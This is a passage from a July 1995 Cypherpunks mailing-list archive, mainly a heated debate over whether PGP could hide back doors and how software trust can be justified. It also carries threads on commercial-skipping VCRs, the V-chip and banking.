PGP follows its recommendations fairly closely. There > is only one place where PGP fails to follow, and that is that PGP does > expose the bucket of random bits, rather than mixing them before > exporting them. However I do not believe that this would affect the > generation of PGP Public Keys. But the RFC acknowledges that these methods are highly suspect and should not be trusted. > PS: In what field is your Doctorate? Ph.D. Electrical and Computer Engineering, U. of Southern California, 1986, subject "Computer Viruses". My complete resume is available through the W3 server (below) under Management Analytics. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From rah at shipwright.com Mon Jul 31 18:00:55 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 31 Jul 95 18:00:55 PDT Subject: Commercial killers Message-ID: God help me, all of this reminds me of a Carl Sagan book, of all things. One of his science fiction characters was said to have made his first fortune by building a commercial zapping chip for VCRs. Butthead Astronomer, indeed... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From mab at crypto.com Mon Jul 31 18:05:10 1995 From: mab at crypto.com (Matt Blaze) Date: Mon, 31 Jul 95 18:05:10 PDT Subject: a hole in PGP In-Reply-To: <9508010008.AA02790@all.net> Message-ID: <199508010112.VAA26078@crypto.com> ... >> Look. If you're qualified, look at the PGP source and vet it yourself. If >> you aren't qualified, figure the market to be efficient in this instance >> and assume the stuff works. > >One of the several points I tried (apparently unsuccessfully) to make is >that with a program that large, it is impractical to verify that there >are no subtle back doors - regardless of how knowledgeable or skilled >you or I may be. Your "assumption of security" perspective is an >inappropriate one unless you are trying to get people to use something >that is not secure. > It's true that, in general, the "burden" of demonstrating whether a system is secure should fall primarily on those who claim it is rather than on those who claim it isn't. It's also true that PGP, for whatever reason, is treated with a degree of reverence that is, perhaps, unwarranted. I, for one, would be much happier to see greater vetting of widely-used programs like PGP. But that does not mean that one can expect to be taken seriously by simply throwing darts and seeing where they land. That would mean that essentially no hardware, software, algorithm or protocol could ever be considered trustworthy by anyone for any purpose. There is a difference between raising specific concerns and making vague, wild, unsupported claims, which is how what you wrote below reads to me. >> Stop wasting our time and bandwidth harassing the MIT folk about whether or >> not their code is clean. Such posturing won't wash around here. > >The headers on the postings allow you to ignore them, but in the >meanwhile, the subject matter is in line with this forum, and the >questions are legitimate. You will have to do better than to appeal to >authority to convince anyone that MIT's version of PGP is secure. > >> >> >> Seriously, it may be an appeal to authority, but it can safely be assumed >> that PGP is clean, and that MIT is *not* involved with the NSA and the Red >> Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats >> postings. > >Why (specifically) do you think so? Because you claim it? Because the >MIT maintainer claims it? You say MIT is not associated with the NSA, >but they have historically been funded by the NSA and other federal >agencies for work on information security. Do you really think that the >only information protected by PGP is dirty pictures? Do you somehow >think that MIT and the NSA are above that sort of thing? All you have to >do is look at history, and it should be clear that this appeal to >authority is often used by those trying to cover things up. If you know >something about PGPs security that you aren't telling us, don't beat >around the bush about it. Come out and say it. Tell us that you have >proven that PGP has no backdoors and what method you used to do that. >Tell us that you have hand verified all the code and that none of it >overwrites the key generation process and tell us how you verified it. > No one knows how "prove" anything substantial, much less the absence of backdoors, for anything but the most trivial software and algorithms. >It cannot be safely assumed that any program is clean or that any one >person or group is not involved with intentionally subverting security. >That violates the fundamental principles of information protection. Your attempt to cast a near-defamatory shadow of suspicion over the individuals and institutions who wrote the software, without raising even a single specific concern about something you've observed about the code, invites more questions about your own motives than those of MIT or its staff. It seems reasonable to ask you to put up or shut up. -matt Disclaimer: I also give away cryptographic source code, in connection with my job as a research scientist for a company that has even closer ties to the spook community than you seem to think MIT has... From dan at netmarket.com Mon Jul 31 18:06:24 1995 From: dan at netmarket.com (Daniel Kohn) Date: Mon, 31 Jul 95 18:06:24 PDT Subject: Sex & Crime TV filter Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 8:50 PM 07/31/95, Patrick May wrote: > My dim memories from a project I did for Sony a couple of years >ago are that commercials are separated by a fixed number of black >frames and some, at least, have tracking information encoded so that >advertisers can monitor how often they are played. I'll try to dig up >more info. From: dfitzpat at interserv.com Wednesday July 26, 1995 -- ShopTalk - -- NEW VCRs TAKE ON COMMERCIALS POINT-BLANK By Jonathan Takiff Philadelphia Daily News Staff Writer Already besieged by Washington politicians over the content of TV programming (and threats of a show-blocking chip), television broadcasters are about to be hit with another whammy. This time it's VCRs that automatically blank out commercials. Next month, Thomson Consumer Electronics will introduce two RCA brand videocassette recorder models that eliminate almost all the commercials during the playback of a recorded program. As fast as you can say, "We'll be back with stupid pet tricks, tonight's Top Ten list and our special guest Madonna," the VCR will go into hyper- drive and zip through two or three minutes of commercials. During the interruption, you can choose to see a solid blue screen on the TV or the commercials zipping by in the rapid scan mode. Most human operators working a remote control during a commercial break tend to over-run the ads and plow into the show, forcing the fastidious amongst us to then back up (yawn) the tape into the end of the last advertisement. But RCA's commercial-free VCR hits the brakes and resumes play at just the right second. At least it did in a recent demonstration I got of the machine. Thomson is promising "90 percent accuracy" in eliminating commercials -- and just commercials. Sorry, the special circuitry doesn't work at all on show breaks that are 30 seconds or less in duration. And in case you were worried, the recording is not tampered with in the least. Should there be adverts you do desire to see, or (Heaven forbid) the VCR scans past something important, the commercial-jump mode is defeatable at any time. When the feature is set in the manual mode, the user initiates the skipping process by a single button pressed on the remote control. Most important, this technology is stupid-proof. That is, it literally runs itself and doesn't affect the way you tape a program. Simply set the timer (or hit the one-touch record button) as normally. After a show is recorded, the VCR checks to see if another taping session has been programmed to start immediately. If not, the deck will automatically rewind the tape and then search through the recording for signs of commercial breaks. Actually, the VCR is looking for "rapid shits in programming matter and brief screen blackouts that indicate advertising," explains Randy Staffs, manager of VCR product management for Thomson. Where it senses a commercial clump, the VCR makes an electronic notch on the tape at the beginning and end of the segment. Later, these notches will cue the VCR to fast-scan over the segment. Originally announced two years ago for an add-on black box product (Arista's Commercial Brake) that got lots of ink but never came to market, Thomson has "considerably refined the [skipping] technology" it has licensed from Arthur D. Little Enterprises, Staggs says. "We've changed all the algorithms [computer formulas] used for spotting the commercials." Thomson has exclusive rights to make commercial-free VCRs at least through the end of the year. It's producing the decks under guarded conditions, Staggs says, "to hold onto our trade secrets for as long as possible." You'll find the commercial skip feature in RCA's hi-fi VR678HF ($499) and four-head monaural VR542 ($399) VCR. Both also boast VCR Plus+ programming and compatibility with the RCA Digital Satellite system. The models should hit dealers' shelves in late August or early September. P.S. Staggs claims these VCRs are "specially programmed" to not skip past commercials for RCA products. We think he's kidding. $$$$ $$$$$ $$$$ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMB193KZKaCr9f/gtAQFa5AP/ZEmtSM/hSXb6zcFHDmv9Me0thtAqqCxZ 7COYgWxuLkl78+y/INpFKW861mrNig1UlO8Q+vDImKK3qUmTS1tzRWNIH9XVyYtA pJ05g/Z/WKUPx17jd2no9oRqut4bziLa4iMj59B/4nxAhIjEtE5TZFP6okCQ1HGm qbFhOteJavc= =Opny -----END PGP SIGNATURE----- dan From fc at all.net Mon Jul 31 18:10:12 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 18:10:12 PDT Subject: a hole in PGP In-Reply-To: Message-ID: <9508010103.AA06094@all.net> > > At 8:08 PM 7/31/95, Dr. Fred said: > > >it is impractical to verify that there > >are no subtle back doors > > Ah. I knew my undergraduate philosophy degree from good ol' Mizzou would > come in handy some day. In the sophistry biz, the above is an informal > fallacy. It's called a disproving a negative, more popularly called the > "Flying Saucer" fallacy, as in, "prove to me that flying saucers (or PGP > trap-doors) don't exist". More accurately, you cannot prove a forall statement about an infinite set by demonstrating examples - but you can disprove it with a single refutation, however, your argument is incorrect in this context. Since computers current digital computers (and programs) are (close to) finite state machines, we can prove many forall statements. But even more to the point, it is the job of the person asking you to trust them to justify that trust. If you trust them with a less-than-adequate basis, you have only yourself to blame when you get burned. > I would put the rest of your rejoinder in the same class of tinker-toy > logic, Doc. That's me - a tinker-toy logician. But why do you believe that PGP can be trusted? Because someone told you so in email on an Internet forum? I would hate to bet billions of dollars a day and the lives of hundreds of thousands of people on that judgement. > You're testing my patience. Feeling flush from my New Orleans road trip, I > went out and bought the commercial version of Eudora, filter-feature and > all, which means I'm just itching to test it. In other words, it means you > are flirting with the kill-file, the bozo-filter, more rudely, a > . Ah!!! A threat. You should be aware that threatening homocide is a form of assault. I will be certain to tell the FBI your exact words... "the kill-file, the bozo-filter, more rudely, a ." sounds to me (and may well sound to them) like a threat to commit murder. > Play nice, Doc, or don't play at all. I am being nice, but you are not. Perhaps you should consider addressing the issues. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From rah at shipwright.com Mon Jul 31 18:10:19 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 31 Jul 95 18:10:19 PDT Subject: a hole in PGP Message-ID: At 8:49 PM 7/31/95, Dr. Fred said: >You might be, but even if you are not, that doesn't mean there are no >back doors. Well, we all knew it would happen, didn't we. I feel like I'm about to shoot Ol' Yeller, but... PLONK! See ya on the other side, Fred. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From fc at all.net Mon Jul 31 18:26:47 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 18:26:47 PDT Subject: a hole in PGP In-Reply-To: <199508010112.VAA26078@crypto.com> Message-ID: <9508010120.AA07073@all.net> ... > It's true that, in general, the "burden" of demonstrating whether a > system is secure should fall primarily on those who claim it is rather > than on those who claim it isn't. It's also true that PGP, for > whatever reason, is treated with a degree of reverence that is, > perhaps, unwarranted. I, for one, would be much happier to see > greater vetting of widely-used programs like PGP. Excellent assessment - I wholely agree with it. > But that does not > mean that one can expect to be taken seriously by simply throwing > darts and seeing where they land. That would mean that essentially no > hardware, software, algorithm or protocol could ever be considered > trustworthy by anyone for any purpose. There is a difference between > raising specific concerns and making vague, wild, unsupported claims, > which is how what you wrote below reads to me. A reasonable response. My question is: Why do you think that the key generation algorithm used by PGP is secure? Specifically, how do we know there is no subtle back door that reduces the problem of testing the typical key space to a solvable problem in today's technology? I don't believe I made ANY "vague, wild, unsupported claims" however, that is certainly a matter of opinion. ... > >Why (specifically) do you think so? Because you claim it? Because the > >MIT maintainer claims it? You say MIT is not associated with the NSA, > >but they have historically been funded by the NSA and other federal > >agencies for work on information security. Do you really think that the > >only information protected by PGP is dirty pictures? Do you somehow > >think that MIT and the NSA are above that sort of thing? All you have to > >do is look at history, and it should be clear that this appeal to > >authority is often used by those trying to cover things up. If you know > >something about PGPs security that you aren't telling us, don't beat > >around the bush about it. Come out and say it. Tell us that you have > >proven that PGP has no backdoors and what method you used to do that. > >Tell us that you have hand verified all the code and that none of it > >overwrites the key generation process and tell us how you verified it. > > No one knows how "prove" anything substantial, much less the absence > of backdoors, for anything but the most trivial software and > algorithms. Excellent - have you looked at the white paper describing the secure "get-only" W3 server available under What's New at http://all.net? I think that this is a step in the right direction toward demonstrating more about a program than that it runs most of the time and seems to give reasonable answers. Perhaps someone would like to make similar demonstrations for PGP. > >It cannot be safely assumed that any program is clean or that any one > >person or group is not involved with intentionally subverting security. > >That violates the fundamental principles of information protection. > > Your attempt to cast a near-defamatory shadow of suspicion over the > individuals and institutions who wrote the software, without raising > even a single specific concern about something you've observed about > the code, invites more questions about your own motives than those of > MIT or its staff. It seems reasonable to ask you to put up or shut > up. Under what analysis do you construe "It cannot be safely assumed" as "near-defamatory"? I don't know you any more than you know me. We are both just mail sources on the Internet. Why do you consider it reasonable to assume that we should all trust statements made by people we do not know and have not met based on their assertion that they think a cryptosystem is safe and free of back doors? If I add a PGP signature, does it make me any more trustworthy? > Disclaimer: I also give away cryptographic source code, in connection > with my job as a research scientist for a company that has even closer > ties to the spook community than you seem to think MIT has... And I should trust you to tell me that PGP is safe for me to use? -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From pgf at tyrell.net Mon Jul 31 18:33:39 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 31 Jul 95 18:33:39 PDT Subject: Zimmermann legal fund In-Reply-To: Message-ID: <199508010129.AA00881@tyrell.net> Date: Mon, 31 Jul 1995 12:12:16 +0800 (HKT) From: Enzo Michelangeli How could it be worse than with the U.S. of A.?? ;-) OK... think about Venezuela. It has bad inflation. It has laws against converting local currency to US dollars on the black market, which is basically defined as any agency/person/corporate entity exchanging at a worse rate than the government rate (at least in Venezuela itself; you can pay your foreign creditors in Bolivars and exchange them on the open market for twice the official exchange rate); all government-rate currency transactions must go through a special currency review board that checks to see if you _really_ need to exchange currency. It is illegal to bribe this board and impossible to get a request acknowledged inside a year without bribery (if it isn't denied because you didn't bribe the members of the board). Of course, one day the U.S. may be this bad. Phil From Michael at umlaw.demon.co.uk Mon Jul 31 18:35:52 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Mon, 31 Jul 95 18:35:52 PDT Subject: U.S. Banks are not all that bad Message-ID: <2925@umlaw.demon.co.uk> In message Douglas Barnes writes: > ... > > I must say that I've had some absolutely amazingly bad experiences > with banks in Asia, Mexico and Central America, so I'm a skeptic > when it comes to assuming that non-US banks are light years better. The U.K. banks make the U.S. look awfully good.... > Although I have no direct experience of European banking, I do know that > the European banking industry, taken as a whole, is substantially > behind the US banking industry in automation and efficiency. Most of Oh yes oh yes oh yes...and I've banked with Lloyds on and off for 12 years... > .... -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html From pgf at tyrell.net Mon Jul 31 18:35:53 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 31 Jul 95 18:35:53 PDT Subject: FBI shirts... In-Reply-To: Message-ID: <199508010131.AA01279@tyrell.net> Hmmph. How boring. If I had the money, I think I'd buy you one of those "Weekly World News" cover page T-shirts. I want to get the one with "12 US Senators are Space Aliens" because it has both of my Senators on the cover, myself... Phil From tcmay at sensemedia.net Mon Jul 31 18:45:56 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 31 Jul 95 18:45:56 PDT Subject: Commercial killers Message-ID: At 1:00 AM 8/1/95, Robert Hettinga wrote: >God help me, all of this reminds me of a Carl Sagan book, of all things. >One of his science fiction characters was said to have made his first >fortune by building a commercial zapping chip for VCRs. > >Butthead Astronomer, indeed... There have been _billions and billions_ of proposals for commercial zappers. (Actually, not such a saganesque number, but dozens at least.) Harry Bartholomew was telling me a year or so ago about some ideas for detecting volume changes. I think, however, the problem of distinguishing commercial from non-commercial signal is, I think, a tough one. My point earlier was not to actually do this, but to suggest that if the V-chip is to code various kinds of content, then the logic is strong for commercial content to be similarly coded. (For example, schools often show taped broadcasts...they might claim that it would be harmful and improper for children to be exposed to beer commercial during school hours...) This would gore the ox of the advertisers, so they might quietly have the whole V-chip thing killed. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From pgf at tyrell.net Mon Jul 31 18:45:59 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 31 Jul 95 18:45:59 PDT Subject: Sat phone permit "wire"taps In-Reply-To: <199507310913.CAA02091@ix2.ix.netcom.com> Message-ID: <199508010141.AA02724@tyrell.net> Bill, I also understood that the Walkers also leaked to the Soviets details on U.S. submarine sonar operating procedures. _Anyway_, my point was, if they can't keep _that_ secret, I doubt they'd be able to keep secret the details/keys for activating the backdoor on whatever artificially weakened system they're forced to use (if they are). Phil From pgf at tyrell.net Mon Jul 31 18:51:30 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 31 Jul 95 18:51:30 PDT Subject: Sex & Crime TV filter In-Reply-To: <9507311424.AA01110@elysion.iaks.ira.uka.de> Message-ID: <199508010146.AA03453@tyrell.net> Date: Mon, 31 Jul 1995 16:24:25 +0200 From: danisch at ira.uka.de (Hadmut Danisch) Sender: owner-cypherpunks at toad.com Precedence: bulk Yesterday I heard in the radio that someone in America has developed some device which darkens the TV screen if there is sex or crime on TV. Does anyone know whether this is true and how it works? Hadmut Actually it's licensed from a British manufacturer of sunglasses called the Peril-Sensitive Sense-O-Matics, which darken rapidly to keep you from seeing things that might distress you. Phil From adam at bwh.harvard.edu Mon Jul 31 19:10:02 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 31 Jul 95 19:10:02 PDT Subject: Commercial killers In-Reply-To: Message-ID: <199508010210.WAA28165@hermes.bwh.harvard.edu> | Harry Bartholomew was telling me a year or so ago about some ideas for | detecting volume changes. I think, however, the problem of distinguishing | commercial from non-commercial signal is, I think, a tough one. Yes, but the tv stations put in a short period of black & silence before returning to the show. I'm pretty confident that this is what the 'zip through commercials' vcrs cue on. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From pgf at tyrell.net Mon Jul 31 19:18:07 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 31 Jul 95 19:18:07 PDT Subject: a hole in PGP In-Reply-To: <9508010008.AA02790@all.net> Message-ID: <199508010213.AA07127@tyrell.net> From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 1995 20:08:15 -0400 (EDT) One of the several points I tried (apparently unsuccessfully) to make is that with a program that large, it is impractical to verify that there For better or for worse, we all must use programs (or collections of programs) that large or larger: even if PGP could be implemented in 1 % of the current source code, it would still be running in an operating system that's cramped in 4 megabytes of ram, because that's a characteristic of the common modern operating systems. The operating systems PGP is running in are larger than PGP itself; if PGP is too large to practically verify the nonexistance of back doors, then there's nothing we can do whatsoever to disprove the existance of back doors. ...are no subtle back doors - regardless of how knowledgeable or skilled you or I may be. Your "assumption of security" perspective is an inappropriate one unless you are trying to get people to use something that is not secure. Or unless you're trying to subject a program to a standard nothing ever written these days is going to meet because it runs in an operating system that's a lot harder to verify as being secure. Please note: I am not trying to suggest that there are purposeful or inadvertent back doors in any of the variants of PC-DOS, Windows, or the Macintosh OS, or more than usual in the various Unix variants (of which the details are available on RISKS; of course, Unix can probably be made reasonably secure if one is aware of the issues involved, which isn't a bad idea. This isn't meant to be a disendorsement of Unix.) The headers on the postings allow you to ignore them, but in the meanwhile, the subject matter is in line with this forum, and the questions are legitimate. You will have to do better than to appeal to authority to convince anyone that MIT's version of PGP is secure. Can you _convince_ me that MacOS 7.5, or Windows 3.1 (the OS I currently use), or WWG, or OS/2 3.0, or Linux, or NetBSD, is reasonably secure? Why (specifically) do you think so? Because you claim it? Because the MIT maintainer claims it? You say MIT is not associated with the NSA, but they have historically been funded by the NSA and other federal agencies for work on information security. Do you really think that the only information protected by PGP is dirty pictures? Do you somehow think that MIT and the NSA are above that sort of thing? All you have to do is look at history, and it should be clear that this appeal to authority is often used by those trying to cover things up. If you know something about PGPs security that you aren't telling us, don't beat around the bush about it. Come out and say it. Tell us that you have proven that PGP has no backdoors and what method you used to do that. Tell us that you have hand verified all the code and that none of it overwrites the key generation process and tell us how you verified it. It cannot be safely assumed that any program is clean or that any one person or group is not involved with intentionally subverting security. That violates the fundamental principles of information protection. What OS should I use to do this? Should I just give up on anything beyond TRS-DOS 6.2? Phil From pgf at tyrell.net Mon Jul 31 19:25:04 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 31 Jul 95 19:25:04 PDT Subject: a hole in PGP In-Reply-To: <9508010103.AA06094@all.net> Message-ID: <199508010220.AA08136@tyrell.net> From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 1995 21:03:49 -0400 (EDT) More accurately, you cannot prove a forall statement about an infinite set by demonstrating examples - but you can disprove it with a single refutation, however, your argument is incorrect in this context. Since computers current digital computers (and programs) are (close to) finite state machines, we can prove many forall statements. But even We can prove some "forall" statements; however, it is hard to tell in advance whether any "forall" statement is one of these easily provable or disprovable problems. This is informally known as the halting problem. more to the point, it is the job of the person asking you to trust them to justify that trust. If you trust them with a less-than-adequate basis, you have only yourself to blame when you get burned. Most of us consider the release of possibly imcriminating source code to be a sign that the persons involved are worthy of trust. Phil From tcmay at sensemedia.net Mon Jul 31 19:26:06 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 31 Jul 95 19:26:06 PDT Subject: Attacks on PGP Message-ID: Things are heating up between Fred Cohen and some of the rest of the list. I don't believe MIT is in collusion with the NSA or any other government agency to deliberately weaken or cripple PGP. I base this on having dealt with some of the MIT folks, with the various source code analyses folks have done, etc. However, I think it's a perfectly *fine* idea for some group to launch a cryptanalytic attack on PGP, or an attack based on any other approaches. This is the "tiger team," or "Team B" approach to finding flaws and weaknesses. I don't take the security of PGP only on faith, though analyzing it is not my bag, as they say. Rather, I use the Popper/Bartley notions of falsifiabilty and see truth as a process, not a state. Seeing lots of source code available, independent compilations on various machines, and believing neither Zimmermann nor Atkins nor Schiller, etc., would consent to inserting back doors into PGP, I am thus led to _believe_ that PGP is probably not so affected. Doesn't mean it isn't so, but I'm not overly worried about it. Still, more studies and technical attacks (technical, not verbal) would be welcome. One of the problems we in the "civilian cryptography" sector face is that we don't have much activity in cryptanalysis. (We've talked about this several times before, before Fred Cohen joined the list, for example.) The NSA and other intelligence agencies have not only code makers, they also have code _breakers_ (such as modern ciphers are breakable, which hasn't been the case much lately, if Bamford and Kahn are to be believed). Probably entire groups whose only job is to try to break the systems devised by others. (Modern ciphers are not as prone to breakage as earlier ciphers were, for technical reasons, so I suspect the number of cryptanalysts has shrunk since the good old days when they had more successes...there may only be a small contingent left...) The lack of cryptanalysis papers at "Crypto" has been striking...I was told that the program committee considers cryptanalysis to be less important than original research. (I can see the rationale in this, as Crypto is an academic/research conference, and there are really no "engineering" crypto conferences. And cryptanalysis might not even fit into an engineering conference very well, as cryptanalysis is traditionally a sort of "hobbyist" activity--if you've read Kahn you'll know what I mean.) Crypto comes in various flavors, from hardware implementations, to number theory, to Unix/IETF sorts of standards, to digital cash, and even to statistical analysis. It is dangerous to have a "monoculture" in which one topic is the trendy one and everyone is urged to work on that (whether the "that" is PGP or Java or anything else equally trendy). Most of the activity has been on adding hooks to PGP to make it usable in other programs, or on remailers. Not as much effort has gone into proofs of validity, systems analysis, etc. (Eric Hughes and I talked about this several years ago, before the Cypherpunks group was formed...the need for "Viper"-like systems with provably correct components, especially for digital money, etc.) If folks think PGP is flawed, or deserves an independent and critical look, then this is a good project for someone. (I think several such analyses have been made, however...this doesn't make it impossible for a flaw or backdoor to exist, but at least the code has been examined by various folks. I'm personally not too worried, though this has little suasive value.) (The Monoculture of Trendy Projects. My own programming mini-project, while proceeding slowly, is of a pattern extractor and "entropy estimator" for text. Stuff like measuring patterns, examining clusterings and author-specific patterns. I'm writing it as a bunch of "critic agents" who are responsible for different areas of analysis. In SmalltalkAgents. My point? There will be those who cite the "monoculture" and scoff at anything not written in C++ for Unix boxes, or not built to be Net-aware from the gitgo, or not written as applets in Java....oh well, in Digital Walden, one marches to a different drummer. Better to program the thing I _want_ to program rather than the things I _don't_ want to program, and hence _won't_. Final note: it'll be ready for use and maybe demonstration when it's ready. And ready when it's finished, finished when it's ready.) I've long appreciated Fred Cohen's work on viruses, so it's nice to have him on the Cypherpunks list. Maybe Fred can tell us if it's really true that he was stopped by U.S. Customs and held for many hours at the Canadian border when going to or returning from a conference where he described computer viruses.... --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From mab at crypto.com Mon Jul 31 19:31:45 1995 From: mab at crypto.com (Matt Blaze) Date: Mon, 31 Jul 95 19:31:45 PDT Subject: a hole in PGP In-Reply-To: <9508010120.AA07073@all.net> Message-ID: <199508010233.WAA26805@crypto.com> >A reasonable response. My question is: Why do you think that the key >generation algorithm used by PGP is secure? Specifically, how do we know >there is no subtle back door that reduces the problem of testing the >typical key space to a solvable problem in today's technology? > I never said that I thought that PGP (or anything else) is "secure." But to the extent that I do trust it for any given purpose, it is for approximately the same reasons that I trust lots of other things that I rely on. I've spot checked some of the code - far from an exhaustive analysis - and I've yet to discover anything myself that points to any specific weakness. I assume that others have done the same, and I also assume that someone like me who did discover a weakness would be likely, as I would be, to publish it and that therefore I'd hear about it. This is, for better or for worse, about as much as can be said for almost anything in the cryptographic world. Far from perfect, to be sure, but hardly unusual or unique to PGP. ... >Under what analysis do you construe "It cannot be safely assumed" as >"near-defamatory"? Because you seem to be pointing a finger at specific people. Your recent messages imply (to me, at least) that you think one or more members of the MIT PGP project may have deliberately tampered with some of the PGP code. You think the risk of this sort of thing having occurred is especially great - greater than with other products, in fact - with MIT PGP because of some (unspecified) connection you believe MIT has with NSA. (If I am mistaken here and you don't think MIT PGP is at special risk, please clarify this - I suspect others got the same impression). PGP did not come from "MIT". It came from specific individuals who work there and who are named in the code and documentation. They have professional and personal reputations and feelings just like we all do. Some of these individuals are on or close to this list. To imply, without offering evidence, that these people are somehow tainted and that their work should be especially mistrusted is harmful and hurtful to them. To use such implications as the entire basis for claims about the security of or risks associated with specific software does not move our understanding of things forward. Pointing out something specific, on the other hand, would move things forward. I think your "arguments" about this subject so far have been vague, unscholarly, unprofessional, needlessly personal, and just plain insulting. -matt From frenchie at magus.dgsys.com Mon Jul 31 19:42:54 1995 From: frenchie at magus.dgsys.com (SysAdmin) Date: Mon, 31 Jul 95 19:42:54 PDT Subject: [NOISE] was Re: a hole in PGP In-Reply-To: <9508010103.AA06094@all.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- My response to Dr. Frederick B. Cohen: I rarely write ANYTHING to the list unless I think it's absolutly necessary and has a semblence of Crypto (keeps the SNR down). I'm looking forward to doing something similar to the crack RC4 thing again. Anyway, after reading the crap below I have been forced to comment. For an individual that parades the title of Doctor (and the indication of intelligence that title should imply) you seem to lack the grasp of what has been stated over and over again. If you can't study the source code, find somone that you trust that can! Prove it *doesn't* work before you knock it. Lastly, this interpretation of a threat from being added to a killfile was the last straw. Tell the FBI I sent the following Dr.Cohen : PLONK! I never play nice. ObCypherpunk: Anybody heard from Detweiller? [snipped] > > You're testing my patience. Feeling flush from my New Orleans road trip, I > > went out and bought the commercial version of Eudora, filter-feature and > > all, which means I'm just itching to test it. In other words, it means you > > are flirting with the kill-file, the bozo-filter, more rudely, a > > . > > Ah!!! A threat. You should be aware that threatening homocide is a form > of assault. I will be certain to tell the FBI your exact words... "the > kill-file, the bozo-filter, more rudely, a ." sounds to me > (and may well sound to them) like a threat to commit murder. > > > Play nice, Doc, or don't play at all. > > I am being nice, but you are not. Perhaps you should consider > addressing the issues. > > -- > -> See: Info-Sec Heaven at URL http://all.net > Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 > - -- ========================================================================== PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. As soon as any man says of the affairs of the state " What does it matter to me? " the state may be given up for lost. J.J.Rousseau - The Social Contract GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r y++ [Geek Code v3.0] a.k.a [ root at magus.dgsys.com / vamagus at delphi.com] ========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Protect Your Privacy. Use PGP for all your E-mail security needs! iQCVAwUBMB2UCLbmxeO+s+1xAQE4fAP/TbNWs17V0U8SVDpp6yaCFGnGelSt4mTL rXFSChLRtiMq/TevfTi9xmDl0j0gDeXORcpQBWlDi0ZfoownpDxHJJab7u97KlB3 WFho1WGWMXU5kyz+g6HBayPHpckH035R4rmCvGZ1zw1qph2v9NzoDhR+8pTgkCYD 7bOQYV6CKMM= =K1aG -----END PGP SIGNATURE----- From mab at crypto.com Mon Jul 31 19:43:51 1995 From: mab at crypto.com (Matt Blaze) Date: Mon, 31 Jul 95 19:43:51 PDT Subject: Attacks on PGP In-Reply-To: Message-ID: <199508010251.WAA26944@crypto.com> [good comments deleted] >The lack of cryptanalysis papers at "Crypto" has been striking...I was told >that the program committee considers cryptanalysis to be less important >than original research. (I can see the rationale in this, as Crypto is an >academic/research conference, and there are really no "engineering" crypto >conferences. And cryptanalysis might not even fit into an engineering >conference very well, as cryptanalysis is traditionally a sort of >"hobbyist" activity--if you've read Kahn you'll know what I mean.) Tim, My impression (based on reviewing papers for the last few CRYPTOs and EUROCRYPTs) is that the reason for the lack of "practical" papers is primarily that not very many of them get submitted. In fact, I think there actually are a fair number of cryptanalysis papers at CRYPTO, at least compared with the even smaller number of papers there that describe new ciphers. Anyway, cryptanalysis IS part of the mainstream of the academic crypto world these days (consider differential cryptanalysis, linear cryptanalysis, etc.) -matt From cwalton at earthlink.net Mon Jul 31 19:47:06 1995 From: cwalton at earthlink.net (Conrad Walton) Date: Mon, 31 Jul 95 19:47:06 PDT Subject: The Net (short movie review) Message-ID: At 8:11 AM 7/31/95, Sandy Sandfort wrote: > >I hope the movie is very popular. It helps us by inducing 